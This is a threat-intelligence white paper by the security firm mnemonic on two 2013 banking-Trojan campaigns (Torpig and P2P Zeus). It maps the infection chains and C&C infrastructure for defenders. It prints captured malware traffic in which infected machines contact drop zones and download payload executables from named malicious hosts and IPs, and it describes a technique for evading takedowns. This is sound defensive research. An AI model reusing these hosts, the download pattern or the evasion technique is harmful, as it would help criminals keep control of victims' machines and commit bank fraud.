The Trojan Wars: Building the Big Picture to Combat Efraud

The Trojan Wars: Building the Big Picture to Combat eFraud

mnemonic Threat Intelligence Unit White Paper Table of Contents Introduction...... 3

The Initial Torpig Campaign...... 4 • Infection Cycles ...... 5 • Ice IX – Downloading Torpig and Pushdo...... 6 • Torpig Campaign C&C infrastructure...... 9 • Ice IX Takedown Avoidance Technique...... 10

The Follow-on P2P Zeus Campaign...... 11 • Infection Cycles...... 12 • Neurevt – Downloading P2P Zeus...... 13

The Way Forward: Conclusions and Recommendations.....14

About mnemonic...... 15

References...... 16 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Introduction

Trojans are a very sophisticated type of malware and their use by cybercriminals to perform widespread eFraud is now well established. They are rarely operated in a standalone mode and the infrastructure used to spread and maintain Trojans is constantly becoming more robust. It is apparent that cybercriminals are spending a considerable amount of time and effort to maintain control of the computers that they have infected. Like managers of any modern day business they wish to protect their investment.

We have followed two major Trojan distribution operations over more than five months analysing infection cycles and the associated Command & Control (C&C) infrastructure. The first operation we observed distributed the Torpig (Sinowal) Trojan [reference 1], while the second distributed the peer-to-peer (P2P) Zeus Trojan [2, 8]. Both operations used the Cutwail botnet [3] that specialises in distributing spam to spread Trojans.

Blog articles and reports on parts of such malware distribution infrastructures are published daily. However, it is more challenging for targeted organisations, primarily retail banks, to create ‘the big picture’ of how the components work together to pose a considerably greater threat. In this white paper we have described the assembly of these components to show how the Trojan infrastructure has no single point of failure, why traditional takedown methods are ineffective, and why targeted organisations require first-rate threat intelligence with regional awareness.

After reading this article we hope you will have an increased understanding of:

• How bank Trojans operate at a technically detailed level • How it is possible to monitor and prevent infection by bank Trojans • The structure of Trojans, botnets and command and control infrastructures • The threat faced by retail banks from robust Trojan infrastructures

3 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

The Initial Torpig Campaign

In June 2013, we observed large volumes of spam directed at Norway. The e-mails claimed to come from well-known Norwegian brands, including airlines, telecommunications operators and TV channels. The e-mails contained zip files as attachments. TrustWave Spiderlabs discovered a similar distribution of e-mail against Australia in the same period [4]. Their analysis concluded that the attachments contained Andromeda Loader [5], which downloaded the Trojan Zbot (a Zeus variant). Our analysis and monitoring revealed that the Trojan infrastructure used in this case was more complex and robust.

Our initial analysis discovered that some of the emails sent to Norwegian recipients contained Andromeda Loader, while others contained Smoke Loader. Both Andromeda and Smoke Loader were used to download the Trojan Ice IX [6], a modified version of Zeus. In some cases we saw a two-stage download with Andromeda Loader downloading Smoke Loader which in turn downloaded Ice IX. The C&C domains used by Andromeda and Ice IX were identical to those reported by Spiderlabs. Ice IX, however, was not used as an attack platform, but to download the Trojan Torpig (Sinowal). After several weeks of such email we also observed some cases where Andromeda downloaded Torpig directly.

Two weeks after the initial spread of such email, we saw that Ice IX downloaded the Pushdo Trojan [3, 7] in addition to Torpig. Pushdo was then used to download the spam engine Cutwail, and the infected machines then tried to distribute new versions of Andromeda and Smoke Loader as email attachments. To summarize, we observed many malware variants and download stages in this Trojan distribution campaign - all very interesting, but why the complexity?

It turns out that the infrastructure used in this distribution operation has been designed to be very robust against takedowns, the primary technique that security companies and law enforcement authorities use to stop C&C infrastructures operating. Andromeda, Smoke Loader, Ice IX and Pushdo operated independently of each other after installation, and all were capable of downloading other types of malware. We observed that Ice IX periodically downloaded new versions of Torpig. If Torpig was removed from an infected computer, it was reinstalled by Ice IX shortly thereafter. If a part of the C&C infrastructure was stopped by outsiders, the other parts could be used to regain control. We also saw an effective tactic by Ice IX to avoid takedowns described later in this paper. This tactic was so successful that the criminals didn’t need to use Andromeda or Smoke Loader to regain control over the infected computers. We saw that other locations exposed to this Trojan distribution operation included Australia, Italy, the Netherlands, Germany and the United States.

4 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Infection Cycles

The best way of understanding the infection cycle of the Torpig campaign is to show it graphically. The flow chart below illustrates the relationships between the different types of malware and infection vectors we observed in this operation:

Spam

Smoke Loader

Andromeda Leader

Ice IX

Torpig Pushdo (Sinowal)

Cutwail

5 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Ice IX – Downloading Torpig and Pushdo

As soon as Ice IX was installed on an infected computer, it started to communicate with its drop zone every 10 minutes. A drop zone is generally used to harvest information from the infected computer, such as passwords. Communication with the drop zone – the URL hxxp://fincal[.]pl/ryadh.php (used in July 2013) – looked like this:

POST /ryadh.php HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: fincal.pl Content-Length: 201 Proxy-Connection: Keep-Alive Pragma: no-cache

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: [REMOVED] Content-Type: text/html Connection: close Content-Length: 64

Ice IX’s drop zone was used to tell the infected computer where it should download Torpig. The encrypted response from the drop zone contained the URL of the .exe file that was used to install Torpig. This .exe file was then downloaded using a regular HTTP GET request:

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: [REMOVED]

6 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Content-Type: text/html Connection: close Content-Length: 162

GET /sdfoh934hoasndfhsyfgbifgnpqwedfbhweinfwe.exe HTTP/1.1 Accept: / Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: shieldssmooth.org

HTTP/1.1 200 OK Server: nginx Date: [REMOVED] Content-Type: application/octet-stream Content-Length: 183808 Last-Modified: [REMOVED] Connection: keep-alive ETag: [REMOVED] Accept-Ranges: bytes

This .exe file then downloaded and installed Torpig’s .dll and .dat files from a different domain. Two weeks after the initial spread of malware, Ice IX downloaded Pushdo. This took place in the same manner as with Torpig, where the download was initiated by Ice IX’s drop zone:

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: [REMOVED] Content-Type: text/html Connection: close Content-Length: 134

7 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

GET /admin/images/icons/6.exe HTTP/1.1 Accept: / Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Host: sahdia.de

HTTP/1.1 200 OK Date: [REMOVED] Server: Apache (prohost.de) Last-Modified: [REMOVED] ETag: [REMOVED] Accept-Ranges: bytes Content-Length: 46592 Cache-Control: max-age=604800 Expires: [REMOVED] Content-Type: application/x-msdownload

Pushdo then downloaded Cutwail and the infected computer tried to distribute email with new malware attached.

The fact that infected computers become spam bots amplifies the threat considerably. It means that more and more computers in the bank’s home market can be infected with banking Trojans. A higher number of infected computers with targeted attack code equates to a more severe threat to the targeted netbank.

8 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Torpig Campaign C&C infrastructure

Andromeda, Ice IX, Torpig, Pushdo and Cutwail all used different C&C domains. Smoke Loader used static IP addresses. Andromeda and Ice IX, however, used the same IP addresses for their C&C infrastructure for more than five months. Both Andromeda’s and Ice IX’s C&C domains had three to four different IP addresses at any time, and these IP addresses changed frequently. The IP addresses were at all times distributed in different parts of the world, such as Bangladesh, China, Lebanon and the United States. The figure below shows an example of domains and IP addresses that were used in August 2013:

194.158.4.42

217.64.107.108

Andromeda Loader dotier.net 190.85.249.159

ICE IX 61.36.178.236 priceless.su Dropzone

222.35.102.133

220.247.243.174

Smoke Loader, Torpig, Pushdo and Cutwail used different C&C infrastructure, and we found no corresponding correlations for these.

9 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Ice IX Takedown Avoidance Technique

Ice IX’s C&C infrastructure consisted of the following:

• A drop zone • An initial (hard-coded) configuration URL • A binary URL • Six configuration URLs

The binary URL is normally used to download new versions of the Trojan, in other words new .exe files. This URL was not used by the Ice IX operation, probably because this functionality was attended to by Andromeda and Smoke Loader. When Ice IX was installed it first contacted the initial configuration URL to download its configuration file. This configuration file contained the drop zone URL and six other configuration URLs. The drop zone URL was used to download other malware, and was therefore the most critical part of the operation. The six configuration URLs in the configuration file used different domains. None of these domains were active so a lookup would give a NXDOMAIN result. We observed many takedown attempts trying to stop this Ice IX infrastructure. All efforts were directed against the drop zone and initial configuration URL. After each of these attempts we saw the following technique used to regain control of the infected computers:

1. activate one of the six configuration URLs (a lookup now provides the same IP addresses as the drop zone)

2. distribute the new configuration file with the new drop zone to the infected computers

3. disable the configuration URL after approximately 48 hours (a lookup now gives a NXDOMAIN result)

This technique allowed the cybercriminals to regain control of the infected computers after each attempt to stop them, in other words the multiple takedown attempts were futile.

10 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

The Follow-on P2P Zeus Campaign

Our continued monitoring of Cutwail revealed another major Trojan campaign using the established C&C infrastructure X weeks after the Torpig campaign. This was directed at the UK and spread the P2P (Gameover) Zeus Trojan using many different types of malware. We know that it is common practice for many criminal actors to co-operate in the malware supply and distribution chain. From what we observed, it is likely that another cybercriminal gang rented the infrastructure as a distribution vehicle for their campaign.

Some variants of malware used to download P2P Zeus have been described in other reports. Pony Loader [2] was extensively used in 2012 and the first three quarters of 2013. In the last quarter of 2013, however, we saw that the P2P Zeus operation adopted several alternative techniques to distribute it. We observed Upatre [9], Smoke Loader and Neurevt (Beta Bot) [10], which downloaded and installed P2P Zeus. The use of Upatre has been widely discussed other places, so we will focus on Neurevt in this paper. P2P Zeus uses a distributed peer-to-peer network rather than centralized C&C infrastructure. This makes P2P Zeus robust against attempts to stop the infrastructure. Moreover, it is difficult to follow the spread of P2P Zeus because many different variants of malware are used to download it.

We also observed the download of other malware from P2P Zeus; namely Neurevt, Pushdo, Kegotip and Smoke Loader. Kegotip [11] is another password-stealing Trojan, similar to Pony. In addition, other security analysts have seen Zeus P2P download the blackmail software Cryptolocker [12].

One of our most interesting observations was that Pushdo and Smoke Loader in some cases downloaded Pony Loader, but the latter was not used to download additional malware. A likely explanation for this is that Pony Loader and Kegotip can be used to steal passwords from infected computers and that this could be the intended application. Evidence of this is given in published reports [13, 14] describing the theft of about two million stolen passwords using Pony Loader linked to P2P Zeus.

11 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Infection Cycles

The flow chart below illustrates the relationships between the different types of malware and infection vectors we observed in this operation:

Spam

Smoke Loader Neurevt (Beta Bot) Upatre Loader Pony Loader

P2P Zeus Necurs

Pushdo Kegotip

Cutwail

12 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Neurevt – Downloading P2P Zeus

We saw that Neurevt was spread as an email attachment from Cutwail in November 2013. When the attachment was run, Neurevt contacted its C&C URL at hxxp://85.143.166[.]167/ ateb/order.php. The C&C server then requested the infected computer to download P2P Zeus from hxxp://62.76.43[.]63/comrade_zs.exe. The HTTP traffic was as follows:

POST /ateb/order.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727) Host: 85.143.166.167 Content-Length: 612 Cache-Control: no-cache

ps0=[REMOVED]&ps1=[REMOVED]&cs1=[REMOVED]&cs2=[REMOVED]&cs3=[RE- MOVED]

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: [REMOVED] Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.19

GET /comrade_zs.exe HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727) Host: 62.76.43.63 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: [REMOVED] Content-Type: application/octet-stream Content-Length: 299008 Connection: keep-alive Last-Modified: [REMOVED] ETag: [REMOVED] Accept-Ranges: bytes

13 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

The Way Forward: Conclusions and Recommendations

The investment that cybercriminals have made in increasing the robustness of Trojan C&C infrastructures means that some existing countermeasures are ineffective. Cleaning of infected computers and takedowns of C&C infrastructure have become more difficult to accomplish. As a result, we can make three general recommendations.

1. takedowns of C&C infrastructure require knowledge of the entire infection chain. Do not try to stop such infrastructure unless you understand the big picture and know how to stop the entire infrastructure. Partly stopping the C&C infrastructure makes the security work more difficult for others and has little impact on the cybercriminals

2. do not try to clean an infected computer using cleaning tools or anti-virus applications – it is likely to be a waste of time. An infected computer needs to be reformatted and reinstalled in order to be sure that the infection is completely removed. This is more important than ever because cybercriminals are now installing several types of independent malware on each machine

3. If your business is under threat from Trojans, ensure that you understand the big picture. When it comes to threat intelligence for eFraud decision support, having just pieces of the jig-saw is not good enough to combat today’s cybercriminals. Work with an expert organisation that can intelligently put the pieces together so that you can take effective countermeasures to protect your business

14 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

About mnemonic

mnemonic is the leading independent provider of IT security professional services and 24x7 managed security services in the Nordics. Our scale, expertise, flexibility and agility, enables our enterprise customers to protect their businesses by deploying products and services from our portfolio that covers the entire information security lifecycle. Our Threat Intelligence Division studies the evolution of advanced threats across the Nordic region and beyond so that we can keep our customers’ businesses safe from attack. mnemonic has created a 24x7 eFraud Prevention Service to protect worldwide financial institutions from Trojans targeting their netbanks. For more information visit www.mnemonic.no or contact [email protected]

15 The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

References

[1] B. Stone-Gross, M. Cova, L. Cavallaro, B. Gilbert, M. Szydlowski, R. Kemmerer, C. Kruegel, G. Vigna. "Your Botnet is My Botnet: Analysis of a Botnet Takeover", Proceedings of the 16th ACM conference on Computer and communications security (CCS'09), 2009. http://seclab.cs.ucsb.edu/media/uploads/papers/torpig.pdf

[2] B. Stone-Gross. "The Lifecycle of Peer-to-Peer (Gameover) ZeuS", Dell SecureWorks CTU, 2012. http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ ZeuS/

[3] A. Decker, D. Sancho, L. Kharouni, M. Goncharov, R. McArdle. "A study of the Pushdo / Cutwail botnet", Trend Micro, 2009 http://www.trendmicro.com/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail- botnet.pdf

[4] R. Mendrez. "Fake Qantas Spam Campaign Leads to Andromeda Bot Infection", Trustwave SpiderLabs blog, 2013. http://blog.spiderlabs.com/2013/06/fake-qantas-spam-campaign-leads-to-andromeda-bot-infection.html

[5] R. Bhatt. "Reversing Andromeda-Gamarue Botnet", Garage4Hackers blog, 2013. http://www.garage4hackers.com/content.php?r=154-Reversing-Andromeda-Gamarue-Botnet

[6] D. Tarakanov. "Ice IX: not cool at all", Kaspersky Lab ZAO Securelist blog, 2011. http://www.securelist.com/en/blog/563/Ice_IX_not_cool_at_all

[7] M. Antonakakis, B. Stone-Gross, J. Demar, K. Stevens, D. Dagon. "Unveiling The Latest Variant of Pushdo", Damballa Inc. / Dell SecureWorks CTU / Georgia Institute of Technology, GTISC, 2013 http://www.secureworks.com/assets/pdf-store/other/mv20.pdf

[8] CERT Polska. "ZeuS-P2P monitoring and analysis", CERT Polska, 2013. http://www.cert.pl/PDF/2013-06-p2p-rap_en.pdf

[9] B. Stone-Gross, R. Dickerson. "Upatre: Another Day Another Downloader", Dell SecureWorks CTU, 2013. http://www.secureworks.com/cyber-threat-intelligence/threats/analyzing-upatre-downloader/

[10] Microsoft Threat Encyclopedia. "Trojan:Win32/Neurevt.A", Microsoft, 2014. http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/ Neurevt.A#tab=2

[11] Microsoft Threat Encyclopedia. “PWS:Win32/Kegotip.C”, Microsoft, 2014. http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS:Win32/ Kegotip.C#tab=2

[12] K. Jarvis. "CryptoLocker Ransomware", Dell SecureWorks CTU, 2013. http://www.secureworks.com/cyber-threat-intelligence/threats/cryptolocker-ransomware/

[13] D. Chechik. "Look What I Found: Moar Pony!", Trustwave SpiderLabs blog, 2013. http://blog.spiderlabs.com/2013/12/look-what-i-found-moar-pony.html

[14] "Kafeine". "One ...random...Gameover Zeus Team Pony sample Story", Malware don't need Coffee, 2013. http://malware.dontneedcoffee.com/2013/12/zeus-game-over-team-is-behind-2.html